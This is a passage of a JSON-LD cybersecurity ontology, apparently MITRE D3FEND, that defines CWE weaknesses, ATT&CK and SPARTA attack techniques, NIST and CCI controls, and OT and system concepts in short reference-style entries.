      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0000"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "AI Model Access"
    },
    {
      "@id": "d3f:CWE-1103",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1103",
      "d3f:definition": "The product relies on third-party components that do not provide equivalent functionality across all desirable platforms.",
      "rdfs:label": "Use of Platform-Dependent Third Party Components",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-758"
      }
    },
    {
      "@id": "d3f:RD-0002.01",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0002.01",
      "d3f:definition": "Compromising a mission’s own ground system grants the adversary preconfigured access to TT&C and automation. High-value targets include operator workstations, mission control servers, procedure libraries, scheduler/orchestration services, key-loading tools and HSMs, antenna control systems, timing/distribution, and RF modems/baseband units. Typical paths: phishing an operator or contractor, abusing remote-support channels, pivoting from enterprise IT to ops, exploiting unpatched services on enclave gateways, or harvesting credentials from poorly segmented test environments. Once inside, an actor can stage malicious procedures, alter rate/size limits, manipulate pass schedules, downgrade authentication in maintenance modes, or quietly siphon telemetry and ephemerides to refine later attacks.",
      "rdfs:label": "Mission-Operated Ground System - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0002/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0002"
      },
      "skos:prefLabel": "Mission-Operated Ground System"
    },
    {
      "@id": "d3f:DataLinkLink",
      "@type": "owl:Class",
      "d3f:definition": "A communication link between two network devices connected directly at the physical layer and on the same network segment; i.e., an OSI Layer 2 link.",
      "d3f:synonym": [
        "Data Link Layer Link",
        "Layer-2 Link",
        "Link Layer Link"
      ],
      "rdfs:label": "Data Link Link",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Link_layer"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalLink"
      }
    },
    {
      "@id": "d3f:SecurityArchitects",
      "@type": [
        "owl:NamedIndividual",
        "d3f:TargetAudience"
      ],
      "rdfs:label": "Security Architects"
    },
    {
      "@id": "d3f:CCI-001858_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a real-time alert in an organization-defined real-time period to organization-defined personnel, roles, and/or locations when organization-defined audit failure events requiring real-time alerts occur.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-03-14T00:00:00"
      },
      "rdfs:label": "CCI-001858"
    },
    {
      "@id": "d3f:CWE-639",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-639",
      "d3f:definition": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.",
      "d3f:synonym": [
        "Broken Object Level Authorization / BOLA",
        "Horizontal Authorization",
        "Insecure Direct Object Reference / IDOR"
      ],
      "rdfs:label": "Authorization Bypass Through User-Controlled Key",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-863"
      }
    },
    {
      "@id": "d3f:CWE-781",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-781",
      "d3f:definition": "The product defines an IOCTL that uses METHOD_NEITHER for I/O, but it does not validate or incorrectly validates the addresses that are provided.",
      "rdfs:label": "Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1285"
      }
    },
    {
      "@id": "d3f:CWE-917",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-917",
      "d3f:definition": "The product constructs all or part of an expression language (EL) statement in a framework such as a Java Server Page (JSP) using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended EL statement before it is executed.",
      "d3f:synonym": "EL Injection",
      "rdfs:label": "Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-77"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_26",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Audit Filtering Actions",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:FileContentRules"
      },
      "rdfs:label": "AC-4(26)"
    },
    {
      "@id": "d3f:SomersD",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SD",
      "rdfs:label": "Somers' D",
      "rdfs:subClassOf": {
        "@id": "d3f:RankCorrelationCoefficient"
      }
    },
    {
      "@id": "d3f:CWE-539",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-539",
      "d3f:definition": "The web application uses persistent cookies, but the cookies contain sensitive information.",
      "rdfs:label": "Use of Persistent Cookies Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:CWE-1209",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1209",
      "d3f:definition": "The reserved bits in a hardware design are not disabled prior to production. Typically, reserved bits are used for future capabilities and should not support any functional logic in the design. However, designers might covertly use these bits to debug or further develop new capabilities in production hardware. Adversaries with access to these bits will write to them in hopes of compromising hardware state.",
      "rdfs:label": "Failure to Disable Reserved Bits",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:contributor",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:OTProcessDataCommand",
      "@type": "owl:Class",
      "d3f:definition": "Manage data associated with a controlled process.",
      "rdfs:label": "OT Process Data Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:Kernel-basedProcessIsolation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Kernel-basedProcessIsolation"
      ],
      "d3f:d3fend-id": "D3-KBPI",
      "d3f:definition": "Using kernel-level capabilities to isolate processes.",
      "d3f:isolates": {
        "@id": "d3f:Process"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-OverviewOfTheSeccompSandbox"
      },
      "rdfs:comment": "e.g. KVM",
      "rdfs:label": "Kernel-based Process Isolation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "_:N361a6d8cb66b4bf290118abf8cd81a2b"
        }
      ]
    },
    {
      "@id": "_:N361a6d8cb66b4bf290118abf8cd81a2b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:T1628",
      "@type": "owl:Class",
      "d3f:attack-id": "T1628",
      "d3f:definition": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Mobile operating systems have features and developer APIs to hide various artifacts, such as an application’s launcher icon. These APIs have legitimate usages, such as hiding an icon to avoid application drawer clutter when an application does not have a usable interface. Adversaries may abuse these features and APIs to hide artifacts from the user to evade detection.",
      "rdfs:label": "Hide Artifacts - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Hide Artifacts"
    },
    {
      "@id": "d3f:CWE-41",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-41",
      "d3f:definition": "The product is vulnerable to file system contents disclosure through path equivalence. Path equivalence involves the use of special characters in file and directory names. The associated manipulations are intended to generate multiple names for the same object.",
      "rdfs:label": "Improper Resolution of Path Equivalence",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-706"
      }
    },
    {
      "@id": "d3f:T1154",
      "@type": "owl:Class",
      "d3f:attack-id": "T1154",
      "d3f:definition": "The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common  keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.005",
      "rdfs:label": "Trap",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.005"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:forges",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x forges y: An technique or agent x counterfeits a digital artifact y, such as a fake credential, with the intent to deceive.",
      "rdfs:label": "forges",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01657814-v"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:creates"
      }
    },
    {
      "@id": "d3f:DigitalMultimedia",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Digital Multimedia refers to content that combines text, audio, images, animations, and video in a digital format for interactive applications.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Multimedia",
      "rdfs:label": "Digital Multimedia",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "d3f:T1090",
      "@type": "owl:Class",
      "d3f:attack-id": "T1090",
      "d3f:definition": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.",
      "rdfs:label": "Proxy",
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:PhysicalLinkDownEvent",
      "@type": "owl:Class",
      "d3f:definition": "Carrier or negotiation is lost, or the port is shut, rendering the link non-operational while the medium remains connected.",
      "rdfs:label": "Physical Link Down Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkEvent"
        },
        {
          "@id": "_:N881eb41e55454bfdaf3a647d3602659b"
        },
        {
          "@id": "_:Nf374ed67fdb84e53ad73c9e8cfad1d7e"
        }
      ]
    },
    {
      "@id": "_:N881eb41e55454bfdaf3a647d3602659b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkUpEvent"
      }
    },
    {
      "@id": "_:Nf374ed67fdb84e53ad73c9e8cfad1d7e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkDisconnectEvent"
      }
    },
    {
      "@id": "d3f:CWE-384",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-384",
      "d3f:definition": "Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions.",
      "rdfs:label": "Session Fixation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-610"
      }
    },
    {
      "@id": "d3f:TrajectoryPrediction",
      "@type": "owl:Class",
      "rdfs:label": "Trajectory Prediction",
      "rdfs:subClassOf": {
        "@id": "d3f:Forecasting"
      }
    },
    {
      "@id": "d3f:PowerSupply",
      "@type": "owl:Class",
      "d3f:definition": "A power supply is an electrical device or module that converts and regulates energy from a source (e.g., the power grid or batteries) to an appropriate voltage, current, and frequency for one or more loads. It may stand alone or be integrated into its host appliance, often providing overcurrent protection, voltage regulation, or power conditioning for safe, stable operation.",
      "rdfs:label": "Power Supply",
      "rdfs:seeAlso": {
        "@id": "dbr:Power_supply"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Vulnerability Monitoring and Scanning | Automated Trend Analyses",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:PlatformHardening"
      },
      "rdfs:label": "RA-5(6)"
    },
    {
      "@id": "d3f:EX-0010.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0010.01",
      "d3f:definition": "Ransomware on a spacecraft encrypts data or critical configuration so that nominal operations can no longer proceed without the attacker’s cooperation. Targets include mass-memory file stores (engineering telemetry, payload data), configuration and command tables, event logs, on-board ephemerides, and even intermediate buffers used by downlink pipelines. Some variants interfere with key services instead of bulk data, e.g., encrypting a command dictionary or table index so valid inputs are rejected, or wrapping the payload data path in an attacker-chosen cipher so downlinked products appear as noise. By denying access to on-board content or control artifacts at scale, attackers convert execution into bargaining power or irreversible mission degradation.",
      "rdfs:label": "Ransomware - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0010/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0010"
      },
      "skos:prefLabel": "Ransomware"
    },
    {
      "@id": "d3f:T1110",
      "@type": "owl:Class",
      "d3f:attack-id": "T1110",
      "d3f:definition": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.",
      "rdfs:label": "Brute Force",
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:WindowsWriteProcessMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Writes data to an area of memory in a specified process. The entire area to be written to must be accessible or the operation fails.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtFlushInstructionCache"
        },
        {
          "@id": "d3f:WindowsNtProtectVirtualMemory"
        },
        {
          "@id": "d3f:WindowsNtWriteVirtualMemory"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory"
      },
      "rdfs:label": "Windows WriteProcessMemory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIWriteMemory"
        },
        {
          "@id": "_:Nb7e0474360ed469280e469b356cfabe8"
        },
        {
          "@id": "_:N254fdf1c36b341569405f6cfd9425d97"
        },
        {
          "@id": "_:N34cad6d64f1c43b1a6cb44c0d9440c79"
        }
      ]
    },
    {
      "@id": "_:Nb7e0474360ed469280e469b356cfabe8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtFlushInstructionCache"
      }
    },
    {
      "@id": "_:N254fdf1c36b341569405f6cfd9425d97",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtProtectVirtualMemory"
      }
    },
    {
      "@id": "_:N34cad6d64f1c43b1a6cb44c0d9440c79",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtWriteVirtualMemory"
      }
    },
    {
      "@id": "d3f:OTAbortCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a device to abort a service/program.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Abort Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:N6540a0c003fb46c789eec2f1553527ce"
        }
      ]
    },
    {
      "@id": "_:N6540a0c003fb46c789eec2f1553527ce",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:AuthenticationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the systematic process of verifying an agent's identity within a system, involving credential validation and identity confirmation.",
      "rdfs:label": "Authentication Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/authentication"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Nf547b9667c02435e8093e61933a6c253"
        },
        {
          "@id": "_:N2bd8038bf459432eb0957c3152798b5a"
        },
        {
          "@id": "_:N1fc5b65e244f4cfb8c4e496d2c064116"
        }
      ],
      "skos:altLabel": "Agent Authentication Event"
    },
    {
      "@id": "_:Nf547b9667c02435e8093e61933a6c253",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:caused-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "_:N2bd8038bf459432eb0957c3152798b5a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "_:N1fc5b65e244f4cfb8c4e496d2c064116",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:process-property",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x process-property y: The process x has the a process-property y.  This is generalization for specific process object properties.",
      "rdfs:label": "process-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1483",
      "@type": "owl:Class",
      "d3f:attack-id": "T1483",
      "d3f:definition": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1568.002",
      "rdfs:label": "Domain Generation Algorithms",
      "rdfs:seeAlso": {
        "@id": "d3f:T1568.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:Reference-DecoyNetwork-BasedServiceForDeceivingAttackers-AmazonTechnologies",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10873601B1"
      },
      "d3f:kb-abstract": "A decoy network-based service uses a decoy credential to lure an attacker to access the decoy network-based service, and monitors the attacker's activity with respect to the decoy network-based service to determine the attacker's motivation. In various examples, a decoy credential is published on an Internet-accessible site, and a system that provides a network-based service (e.g., a service provider network) subsequently receives an access request from a computing device that includes the decoy credential. Based on the decoy credential, the computing device may be provided access to a decoy network-based service, and application programming interface (API) calls made by the computing device may be routed through a decoy control plane. The data relating to the API calls may be stored and analyzed to determine a motivation of the attacker, which may be used in various downstream applications to improve security for customers of the network-based service.",
      "d3f:kb-author": "Thomas Stickle",
      "d3f:kb-mitre-analysis": "MITRE analysis was not found.",
      "d3f:kb-organization": "Amazon Technologies",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyUserCredential"
      },
      "d3f:kb-reference-title": "Decoy network-based service for deceiving attackers",
      "rdfs:label": "Reference - Decoy Network-Based Service for Deceiving Attackers - Amazon Technologies"
    },
    {
      "@id": "d3f:CWE-833",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-833",
      "d3f:definition": "The product contains multiple threads or executable segments that are waiting for each other to release a necessary lock, resulting in deadlock.",
      "rdfs:label": "Deadlock",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:T1036.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.002",
      "d3f:definition": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \\u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)",
      "d3f:modifies": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "Right-to-Left Override",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:Nbf1d7bc3279e4858a57ec7514cb2aee2"
        }
      ]
    },
    {
      "@id": "_:Nbf1d7bc3279e4858a57ec7514cb2aee2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:CWE-316",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-316",
      "d3f:definition": "The product stores sensitive information in cleartext in memory.",
      "rdfs:label": "Cleartext Storage of Sensitive Information in Memory",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:CWE-920",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-920",
      "d3f:definition": "The product operates in an environment in which power is a limited resource that cannot be automatically replenished, but the product does not properly restrict the amount of power that its operation consumes.",
      "rdfs:label": "Improper Restriction of Power Consumption",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-400"
      }
    },
    {
      "@id": "d3f:validated-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x validated-by y: The digital artifact x has its authenticity and correctness confirmed or verified by the technique, operation, or agent y.",
      "rdfs:label": "validated-by",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:SymbolicAI",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SR",
      "d3f:definition": "Symbolic artificial intelligence is the term for the collection of all methods in artificial intelligence that are based on high-level symbolic (human-readable) representations of problems, logic, and search.",
      "d3f:kb-article": "## How it works\nSymbolic artificial intelligence is used in tools such as logic programming, production rules, semantic nets and frames, and it developed applications such as knowledge-based systems (in particular, expert systems), symbolic mathematics, automated theorem provers, ontologies, the semantic web, and automated planning and scheduling systems. The Symbolic AI paradigm led to seminal ideas in search, symbolic programming languages, agents, multi-agent systems, the semantic web, and the strengths and limitations of formal knowledge and reasoning systems.\n\n## References\n1. Symbolic artifical intelligence. (2023, May 23). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Symbolic_artificial_intelligence)",
      "d3f:synonym": "Symbolic Artificial Intelligence",
      "rdfs:label": "Symbolic AI",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicLogic"
      }
    },
    {
      "@id": "d3f:ConfigurationDatabaseRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Configuration Database Record defines settings, parameters, or preferences for applications, systems, or devices.",
      "d3f:synonym": "Configuration Record",
      "rdfs:label": "Configuration Database Record",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationResource"
        },
        {
          "@id": "d3f:DatabaseRecord"
        }
      ]
    },
    {
      "@id": "d3f:CWE-160",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-160",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Leading Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:CWE-682",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-682",
      "d3f:definition": "The product performs a calculation that generates incorrect or unintended results that are later used in security-critical decisions or resource management.",
      "rdfs:label": "Incorrect Calculation",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:DE-0002.01",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0002.01",
      "d3f:definition": "Threat actors may utilize access to the ground system to inhibit its ability to accurately process, render, or interpret spacecraft telemetry, effectively leaving ground controllers unaware of the spacecraft’s true state or activity. This may involve traditional denial-based techniques, such as disabling telemetry software, corrupting processing pipelines, or crashing display interfaces. In addition, more subtle deception-based techniques may be used to falsify telemetry data within the ground system ,  such as modifying command counters, acknowledgments, housekeeping data, or sensor outputs ,  to provide the appearance of nominal operation. These actions can suppress alerts, mask unauthorized activity, or prevent both automated and manual mitigations from being initiated based on misleading ground-side information. Because telemetry is the primary method by which ground controllers monitor the health, behavior, and safety of the spacecraft, any disruption or falsification of this data directly undermines situational awareness and operational control.",
      "rdfs:label": "Inhibit Ground System Functionality - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0002/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0002"
      },
      "skos:prefLabel": "Inhibit Ground System Functionality"
    },
    {
      "@id": "d3f:CWE-441",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-441",
      "d3f:definition": "The product receives a request, message, or directive from an upstream component, but the product does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the product's control sphere. This causes the product to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor.",
      "d3f:synonym": "Confused Deputy",
      "rdfs:label": "Unintended Proxy or Intermediary ('Confused Deputy')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-610"
      }
    },
    {
      "@id": "d3f:CWE-13",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-13",
      "d3f:definition": "Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource making them an easy target for attackers.",
      "rdfs:label": "ASP.NET Misconfiguration: Password in Configuration File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-260"
      }
    },
    {
      "@id": "d3f:T1067",
      "@type": "owl:Class",
      "d3f:attack-id": "T1067",
      "d3f:definition": "A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1542.003",
      "rdfs:label": "Bootkit",
      "rdfs:seeAlso": {
        "@id": "d3f:T1542.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CCI-002308_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:SystemConfigurationPermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides authorized individuals the capability to define or change the type of security attributes available for association with objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002308"
    },
    {
      "@id": "d3f:CWE-82",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-82",
      "d3f:definition": "The web application does not neutralize or incorrectly neutralizes scripting elements within attributes of HTML IMG tags, such as the src attribute.",
      "rdfs:label": "Improper Neutralization of Script in Attributes of IMG Tags in a Web Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-83"
      }
    },
    {
      "@id": "d3f:ServiceApplicationProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Service Application Process performs specific tasks or provides functionality to support other processes, applications, or users.",
      "rdfs:label": "Service Application Process",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationProcess"
      }
    },
    {
      "@id": "d3f:T1574.006",
      "@type": [
        "owl:Class",
